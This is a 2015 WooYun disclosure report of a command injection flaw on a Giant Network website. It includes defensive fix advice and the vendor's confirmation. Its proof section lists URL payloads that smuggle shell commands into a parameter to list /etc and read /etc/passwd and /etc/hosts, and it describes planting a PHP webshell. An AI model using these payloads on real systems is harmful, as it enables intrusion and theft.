漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0142702
漏洞标题:巨人网络某站命令注入漏洞(真正的命令注入)
相关厂商:巨人网络
漏洞作者: mosin
提交时间:2015-09-22 08:23
修复时间:2015-11-08 06:02
公开时间:2015-11-08 06:02
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开
简要描述:
男:5块?
女:我不是那种人。
男:50块?
女:你当我是什么人。
男:500块?
女:今晚我是你的人。
男:5000块?
女:今晚别把我当人。
男:50000块?
女:不管你来多少人。
男:500000块?
女:不管来的是不是人!
详细说明:
巨人网络某站存在commend注入漏洞,注入地址:
这个命令执行漏洞SQL注入界的危害算是比较大的了。
这个利用起来也比较容易
在这里感谢@五道口杀气的文章:http://drops.wooyun.org/papers/1018
我一直以来只是在理论上了解命令注入,现在有了事例,可以爽一下了。。。
废话不多说了,开干!
漏洞证明:
1:读取当前目录的文件
2:查看当前用户:
权限你们懂得!
3:查看etc目录
http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27
4:读取系统帐号
http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27
5,查看主机
http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/hosts+%26%27
如果我们执行写一句话呢?
写入一句话成功
现在我们来连接一句话:
额,失败了,可能有防火墙,或者只允许内网连接..算了吧,不深入了,点到为止吧
在这里我就不写其他小马了,这么多已经可以说明问题了,最后上传一个php.txt证明一下吧!
修复方案:
PHP命令注入攻击漏洞的防范:
PHP中命令注入攻击漏洞带来的危害和影响很严重。防范命令注入攻击漏洞的存在可以通过以下几种方法。
1. 尽量不要执行外部的应用程序或命令。
2. 使用自定义函数或函数库实现外部应用程序或命令的功能。
3. 在执行system、eval等命令执行功能的函数前,确定参数内容。
4. 使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5. 使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。这样,在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。
PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一。国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害,修补程序中可能存在的被黑客利用的漏洞情况,保护网络用户的安全,免受挂马、钓鱼等恶意代码的攻击
详细请参见:
版权声明:转载请注明来源 mosin@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-09-24 06:01
厂商回复:
非常感谢您的报告,问题已着手处理,感谢大家对巨人网络业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无